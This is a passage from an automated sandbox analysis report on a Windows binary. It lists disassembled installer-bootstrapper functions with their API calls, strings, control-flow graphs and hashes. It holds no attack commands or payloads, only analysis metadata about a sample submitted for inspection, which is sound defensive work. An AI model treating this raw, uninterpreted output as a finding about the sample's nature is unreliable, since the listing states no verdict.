                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateFromInstanceProg
                                                            • String ID: Microsoft.Update.AutoUpdate
                                                            • API String ID: 2151042543-675569418
                                                            • Opcode ID: d0df3fd1283860ee8c7e0b9fba5a1f96c99d84678dcf874f44705f87a9823fd1
                                                            • Instruction ID: 6b9448a37028d4325b393af5255aeecfea9a5a485fae59d79c593f42ca94e473
                                                            • Opcode Fuzzy Hash: d0df3fd1283860ee8c7e0b9fba5a1f96c99d84678dcf874f44705f87a9823fd1
                                                            • Instruction Fuzzy Hash: D8F05471600608BBDB10EFA8DD05AEFB7FCFB08710F400266FA01E7250D7B1AE0486A2
                                                            Function 008B0E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008B0E28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                            • API String ID: 190572456-850864035
                                                            • Opcode ID: 0c4c757738df04739c3aa33345c9004a7f502ceb16f04ff947f510862b0fde96
                                                            • Instruction ID: ba24885d0fa2fa019a33fff134c242c062f41800e6c80aad8e356836a9a7359c
                                                            • Opcode Fuzzy Hash: 0c4c757738df04739c3aa33345c9004a7f502ceb16f04ff947f510862b0fde96
                                                            • Instruction Fuzzy Hash: 51E0EC70943226DAC7115B15BC05B4A7F90F731B59F064367E415DA370D7B5C850CF91

                                                            Executed Functions

                                                            Function 00D01070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D033C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,00D010DD,?,00000000), ref: 00D033E8
                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00D010F6
                                                              • Part of subcall function 00D01175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00D0111A,cabinet.dll,00000009,?,?,00000000), ref: 00D01186
                                                              • Part of subcall function 00D01175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,00D0111A,cabinet.dll,00000009,?,?,00000000), ref: 00D01191
                                                              • Part of subcall function 00D01175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D0119F
                                                              • Part of subcall function 00D01175: GetLastError.KERNEL32(?,?,?,?,?,00D0111A,cabinet.dll,00000009,?,?,00000000), ref: 00D011BA
                                                              • Part of subcall function 00D01175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D011C2
                                                              • Part of subcall function 00D01175: GetLastError.KERNEL32(?,?,?,?,?,00D0111A,cabinet.dll,00000009,?,?,00000000), ref: 00D011D7
                                                            • CloseHandle.KERNEL32(?,?,?,?,00D4B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00D01131
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                            • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                            • API String ID: 3687706282-3151496603
                                                            • Opcode ID: 806cfa0a7fce32abc47934e4653a73715e652a7414e2bc4660d7c2ea3cd051fa
                                                            • Instruction ID: f309fad5e526ce223d3b7d600f7c1769dd3c8668e2f15714c2fabecd3e4357e9
                                                            • Opcode Fuzzy Hash: 806cfa0a7fce32abc47934e4653a73715e652a7414e2bc4660d7c2ea3cd051fa
                                                            • Instruction Fuzzy Hash: D3218B7590031CABCB109FA9DC45BEEBBB8EB19724F14411AEA14B73C1D7B09904CBB1
                                                            Function 00D3FEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00D6B5FC,00000000,?,?,?,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D3FEF4
                                                            • GetCurrentProcessId.KERNEL32(00000000,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D3FF04
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D3FF0D
                                                            • GetLocalTime.KERNEL32(8000FFFF,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D3FF23
                                                            • LeaveCriticalSection.KERNEL32(00D6B5FC,00D1E93B,?,00000000,0000FDE9,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D4001A
                                                            Strings
                                                            • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00D3FFC0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                            • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                            • API String ID: 296830338-59366893
                                                            • Opcode ID: c7563023ef0d6df31226cf9df1a745b10ee7708a6b17b2b6b9a5bb607834a5af
                                                            • Instruction ID: 514d67b710137f627072442ae9039a5854ecf37dafd2f4f4ba585d52bb8875e7
                                                            • Opcode Fuzzy Hash: c7563023ef0d6df31226cf9df1a745b10ee7708a6b17b2b6b9a5bb607834a5af
                                                            • Instruction Fuzzy Hash: D5416071D01219ABDB21DFA4DC05ABEBBB8EF18B21F044426F901EA250D735CD85DBB1
                                                            Function 00D1A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Failed to copy working folder., xrefs: 00D1A116
                                                            • Failed to calculate working folder to ensure it exists., xrefs: 00D1A0D8
                                                            • Failed create working folder., xrefs: 00D1A0EE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryErrorLastProcessWindows
                                                            • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                            • API String ID: 3841436932-2072961686
                                                            • Opcode ID: a44ba17f94133b5a8fe79d3fadaca84445fd191a64e3fd4e511260b790a149dd
                                                            • Instruction ID: 99a029e8fb63a9b82cc61b469e5edabba41fc394b2aef515e975178b2faab214
                                                            • Opcode Fuzzy Hash: a44ba17f94133b5a8fe79d3fadaca84445fd191a64e3fd4e511260b790a149dd
                                                            • Instruction Fuzzy Hash: 27018432902628FB8F225B59EC06CDEBB79DF95721B604256FC0077211DF31DE80A6B6
                                                            Function 00D0DF33 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00D0E058
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00D0E736
                                                              • Part of subcall function 00D0394F: GetProcessHeap.KERNEL32(?,?,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03960
                                                              • Part of subcall function 00D0394F: RtlAllocateHeap.NTDLL(00000000,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03967
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeHeapString$AllocateProcess
                                                            • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                            • API String ID: 336948655-2953049543
                                                            • Opcode ID: 4342b9a3c373ff442c0b950d65c15fe48d325f31544675784fd98fe6ad62448d
                                                            • Instruction ID: df1998c979a30bee7933bc4467357e54b295c4711a404fd394f0a6bb3dd5b1a1
                                                            • Opcode Fuzzy Hash: 4342b9a3c373ff442c0b950d65c15fe48d325f31544675784fd98fe6ad62448d
                                                            • Instruction Fuzzy Hash: 2032BF31D40226AFDF119BA4CC46FAEBBA4AF14721F144A65ED18BB2D0D771ED049BB0
                                                            Function 00D0F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 222 d0f9e3-d0fa14 call d439af 225 d0fa16 222->225 226 d0fa18-d0fa1a 222->226 225->226 227 d0fa1c-d0fa29 call d40237 226->227 228 d0fa2e-d0fa47 call d432f3 226->228 235 d0ff16-d0ff1b 227->235 233 d0fa53-d0fa68 call d432f3 228->233 234 d0fa49-d0fa4e 228->234 246 d0fa74-d0fa81 call d0ea42 233->246 247 d0fa6a-d0fa6f 233->247 236 d0ff0d-d0ff14 call d40237 234->236 238 d0ff23-d0ff28 235->238 239 d0ff1d-d0ff1f 235->239 252 d0ff15 236->252 242 d0ff30-d0ff35 238->242 243 d0ff2a-d0ff2c 238->243 239->238 244 d0ff37-d0ff39 242->244 245 d0ff3d-d0ff41 242->245 243->242 244->245 249 d0ff43-d0ff46 call d45636 245->249 250 d0ff4b-d0ff52 245->250 255 d0fa83-d0fa88 246->255 256 d0fa8d-d0faa2 call d432f3 246->256 247->236 249->250 252->235 255->236 259 d0faa4-d0faa9 256->259 260 d0faae-d0fac0 call d44c97 256->260 259->236 263 d0fac2-d0faca 260->263 264 d0facf-d0fae4 call d432f3 260->264 265 d0fd99-d0fda2 call d40237 263->265 269 d0faf0-d0fb05 call d432f3 264->269 270 d0fae6-d0faeb 264->270 265->252 274 d0fb11-d0fb23 call d43505 269->274 275 d0fb07-d0fb0c 269->275 270->236 278 d0fb25-d0fb2a 274->278 279 d0fb2f-d0fb45 call d439af 274->279 275->236 278->236 282 d0fdf4-d0fe0e call d0ecbe 279->282 283 d0fb4b-d0fb4d 279->283 290 d0fe10-d0fe15 282->290 291 d0fe1a-d0fe32 call d439af 282->291 284 d0fb59-d0fb6e call d43505 283->284 285 d0fb4f-d0fb54 283->285 292 d0fb70-d0fb75 284->292 293 d0fb7a-d0fb8f call d432f3 284->293 285->236 290->236 298 d0fe38-d0fe3a 291->298 299 d0fefc-d0fefd call d0f0f8 291->299 292->236 301 d0fb91-d0fb93 293->301 302 d0fb9f-d0fbb4 call d432f3 293->302 303 d0fe46-d0fe64 call d432f3 298->303 304 d0fe3c-d0fe41 298->304 305 d0ff02-d0ff06 299->305 301->302 306 d0fb95-d0fb9a 301->306 312 d0fbc4-d0fbd9 call d432f3 302->312 313 d0fbb6-d0fbb8 302->313 314 d0fe70-d0fe88 call d432f3 303->314 315 d0fe66-d0fe6b 303->315 304->236 305->252 309 d0ff08 305->309 306->236 309->236 323 d0fbe9-d0fbfe call d432f3 312->323 324 d0fbdb-d0fbdd 312->324 313->312 316 d0fbba-d0fbbf 313->316 321 d0fe95-d0fead call d432f3 314->321 322 d0fe8a-d0fe8c 314->322 315->236 316->236 331 d0feba-d0fed2 call d432f3 321->331 332 d0feaf-d0feb1 321->332 322->321 325 d0fe8e-d0fe93 322->325 333 d0fc00-d0fc02 323->333 334 d0fc0e-d0fc23 call d432f3 323->334 324->323 326 d0fbdf-d0fbe4 324->326 325->236 326->236 341 d0fed4-d0fed9 331->341 342 d0fedb-d0fef3 call d432f3 331->342 332->331 335 d0feb3-d0feb8 332->335 333->334 336 d0fc04-d0fc09 333->336 343 d0fc33-d0fc48 call d432f3 334->343 344 d0fc25-d0fc27 334->344 335->236 336->236 341->236 342->299 350 d0fef5-d0fefa 342->350 351 d0fc58-d0fc6d call d432f3 343->351 352 d0fc4a-d0fc4c 343->352 344->343 346 d0fc29-d0fc2e 344->346 346->236 350->236 356 d0fc7d-d0fc92 call d432f3 351->356 357 d0fc6f-d0fc71 351->357 352->351 353 d0fc4e-d0fc53 352->353 353->236 361 d0fca2-d0fcba call d432f3 356->361 362 d0fc94-d0fc96 356->362 357->356 358 d0fc73-d0fc78 357->358 358->236 366 d0fcca-d0fce2 call d432f3 361->366 367 d0fcbc-d0fcbe 361->367 362->361 364 d0fc98-d0fc9d 362->364 364->236 371 d0fcf2-d0fd07 call d432f3 366->371 372 d0fce4-d0fce6 366->372 367->366 368 d0fcc0-d0fcc5 367->368 368->236 376 d0fda7-d0fda9 371->376 377 d0fd0d-d0fd2a CompareStringW 371->377 372->371 373 d0fce8-d0fced 372->373 373->236 378 d0fdb4-d0fdb6 376->378 379 d0fdab-d0fdb2 376->379 380 d0fd34-d0fd49 CompareStringW 377->380 381 d0fd2c-d0fd32 377->381 384 d0fdc2-d0fdda call d43505 378->384 385 d0fdb8-d0fdbd 378->385 379->378 382 d0fd57-d0fd6c CompareStringW 380->382 383 d0fd4b-d0fd55 380->383 386 d0fd75-d0fd7a 381->386 387 d0fd7c-d0fd94 call d03821 382->387 388 d0fd6e 382->388 383->386 384->282 392 d0fddc-d0fdde 384->392 385->236 386->378 387->265 388->386 394 d0fde0-d0fde5 392->394 395 d0fdea 392->395 394->236 395->282
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringVariant$AllocClearFreeInit
                                                            • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                            • API String ID: 760788290-2956246334
                                                            • Opcode ID: 189f43f585c605078b9d6b58ea3551f38ac593942c374d17896c972480457097
                                                            • Instruction ID: 3920d5942cd28879f95d6d5a8bd3aac3bc7faf93831a41b3266e0d1dcaecb660
                                                            • Opcode Fuzzy Hash: 189f43f585c605078b9d6b58ea3551f38ac593942c374d17896c972480457097
                                                            • Instruction Fuzzy Hash: D1E1D236E44666BFCF3197A4CC42FAEBAA4AF01711F250271BD19B69D1C7A09D0C96F0
                                                            Function 00D0B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 396 d0b48b-d0b500 call d2f8e0 * 2 401 d0b502-d0b50c GetLastError 396->401 402 d0b538-d0b53e 396->402 405 d0b519 401->405 406 d0b50e-d0b517 401->406 403 d0b540 402->403 404 d0b542-d0b554 SetFilePointerEx 402->404 403->404 407 d0b556-d0b560 GetLastError 404->407 408 d0b588-d0b5a2 ReadFile 404->408 409 d0b520-d0b52d call d03821 405->409 410 d0b51b 405->410 406->405 412 d0b562-d0b56b 407->412 413 d0b56d 407->413 414 d0b5a4-d0b5ae GetLastError 408->414 415 d0b5d9-d0b5e0 408->415 425 d0b532-d0b533 409->425 410->409 412->413 419 d0b574-d0b586 call d03821 413->419 420 d0b56f 413->420 421 d0b5b0-d0b5b9 414->421 422 d0b5bb 414->422 417 d0b5e6-d0b5ef 415->417 418 d0bbd7-d0bbeb call d03821 415->418 417->418 427 d0b5f5-d0b605 SetFilePointerEx 417->427 438 d0bbf0 418->438 419->425 420->419 421->422 423 d0b5c2-d0b5d4 call d03821 422->423 424 d0b5bd 422->424 423->425 424->423 430 d0bbf1-d0bbf7 call d40237 425->430 432 d0b607-d0b611 GetLastError 427->432 433 d0b63c-d0b654 ReadFile 427->433 452 d0bbf8-d0bc0a call d2e06f 430->452 440 d0b613-d0b61c 432->440 441 d0b61e 432->441 435 d0b656-d0b660 GetLastError 433->435 436 d0b68b-d0b692 433->436 442 d0b662-d0b66b 435->442 443 d0b66d 435->443 445 d0b698-d0b6a2 436->445 446 d0bbbc-d0bbd5 call d03821 436->446 438->430 440->441 447 d0b620 441->447 448 d0b625-d0b632 call d03821 441->448 442->443 450 d0b674-d0b681 call d03821 443->450 451 d0b66f 443->451 445->446 453 d0b6a8-d0b6cb SetFilePointerEx 445->453 446->438 447->448 448->433 450->436 451->450 458 d0b702-d0b71a ReadFile 453->458 459 d0b6cd-d0b6d7 GetLastError 453->459 461 d0b751-d0b769 ReadFile 458->461 462 d0b71c-d0b726 GetLastError 458->462 465 d0b6e4 459->465 466 d0b6d9-d0b6e2 459->466 469 d0b7a0-d0b7bb SetFilePointerEx 461->469 470 d0b76b-d0b775 GetLastError 461->470 467 d0b733 462->467 468 d0b728-d0b731 462->468 471 d0b6e6 465->471 472 d0b6eb-d0b6f8 call d03821 465->472 466->465 476 d0b735 467->476 477 d0b73a-d0b747 call d03821 467->477 468->467 474 d0b7f5-d0b814 ReadFile 469->474 475 d0b7bd-d0b7c7 GetLastError 469->475 478 d0b782 470->478 479 d0b777-d0b780 470->479 471->472 472->458 480 d0b81a-d0b81c 474->480 481 d0bb7d-d0bb87 GetLastError 474->481 485 d0b7d4 475->485 486 d0b7c9-d0b7d2 475->486 476->477 477->461 482 d0b784 478->482 483 d0b789-d0b796 call d03821 478->483 479->478 488 d0b81d-d0b824 480->488 490 d0bb94 481->490 491 d0bb89-d0bb92 481->491 482->483 483->469 492 d0b7d6 485->492 493 d0b7db-d0b7eb call d03821 485->493 486->485 495 d0bb58-d0bb75 call d03821 488->495 496 d0b82a-d0b836 488->496 498 d0bb96 490->498 499 d0bb9b-d0bbb1 call d03821 490->499 491->490 492->493 493->474 511 d0bb7a-d0bb7b 495->511 502 d0b841-d0b84a 496->502 503 d0b838-d0b83f 496->503 498->499 516 d0bbb2-d0bbba call d40237 499->516 508 d0b850-d0b876 ReadFile 502->508 509 d0bb1b-d0bb32 call d03821 502->509 503->502 507 d0b884-d0b88b 503->507 513 d0b8b4-d0b8cb call d0394f 507->513 514 d0b88d-d0b8af call d03821 507->514 508->481 512 d0b87c-d0b882 508->512 522 d0bb37-d0bb3d call d40237 509->522 511->516 512->488 526 d0b8cd-d0b8ea call d03821 513->526 527 d0b8ef-d0b904 SetFilePointerEx 513->527 514->511 516->452 537 d0bb43-d0bb44 522->537 526->430 528 d0b944-d0b969 ReadFile 527->528 529 d0b906-d0b910 GetLastError 527->529 535 d0b9a0-d0b9ac 528->535 536 d0b96b-d0b975 GetLastError 528->536 533 d0b912-d0b91b 529->533 534 d0b91d 529->534 533->534 538 d0b924-d0b934 call d03821 534->538 539 d0b91f 534->539 540 d0b9ae-d0b9ca call d03821 535->540 541 d0b9cf-d0b9d3 535->541 542 d0b982 536->542 543 d0b977-d0b980 536->543 544 d0bb45-d0bb47 537->544 561 d0b939-d0b93f call d40237 538->561 539->538 540->522 549 d0b9d5-d0ba09 call d03821 call d40237 541->549 550 d0ba0e-d0ba21 call d44a05 541->550 545 d0b984 542->545 546 d0b989-d0b99e call d03821 542->546 543->542 544->452 551 d0bb4d-d0bb53 call d03a16 544->551 545->546 546->561 549->544 563 d0ba23-d0ba28 550->563 564 d0ba2d-d0ba37 550->564 551->452 561->537 563->561 567 d0ba41-d0ba49 564->567 568 d0ba39-d0ba3f 564->568 572 d0ba55-d0ba58 567->572 573 d0ba4b-d0ba53 567->573 571 d0ba5a-d0baba call d0394f 568->571 576 d0babc-d0bad8 call d03821 571->576 577 d0bade-d0baff call d2f360 call d0b208 571->577 572->571 573->571 576->577 577->544 584 d0bb01-d0bb11 call d03821 577->584 584->509
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B502
                                                            • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B550
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B556
                                                            • ReadFile.KERNELBASE(00000000,00D04461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B59E
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B5A4
                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B601
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B607
                                                            • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B650
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B656
                                                            • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B6C7
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B6CD
                                                            • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B716
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B71C
                                                            • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B765
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B76B
                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B7B7
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B7BD
                                                              • Part of subcall function 00D0394F: GetProcessHeap.KERNEL32(?,?,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03960
                                                              • Part of subcall function 00D0394F: RtlAllocateHeap.NTDLL(00000000,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03967
                                                            • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B810
                                                            • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B872
                                                            • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B8FC
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B906
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
